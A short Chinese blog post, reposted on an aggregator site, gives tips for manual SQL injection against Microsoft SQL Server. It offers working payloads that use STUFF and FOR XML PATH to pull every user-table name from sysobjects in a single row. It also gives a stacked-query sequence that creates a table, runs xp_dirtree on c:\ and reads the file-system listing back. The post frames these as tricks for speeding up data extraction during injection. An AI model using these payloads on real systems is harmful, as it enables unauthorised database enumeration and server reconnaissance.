sql注入小技巧 -凯发k8官方网

平时手工mssql注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句，有兴趣的朋友可以试试，类似mysql的group_concat ！效果还是不错的！

测试1：
select top 1 name=stuff((select ',' [name] from sysobjects t  where xtype='u' for xml path('')), 1, 1, '') from sysobjects t1

测试2：

create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

select top 1 paths=stuff((select ',' [paths] from dirs for xml path('')), 1, 1, '') from dirs t1

转载于:https://www.cnblogs.com/amwld/archive/2011/04/19/2020417.html

与50位技术专家面对面20年技术见证，附赠技术全景图

总结

以上是凯发k8官方网为你收集整理的sql注入小技巧的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得凯发k8官方网网站内容还不错，欢迎将凯发k8官方网推荐给好友。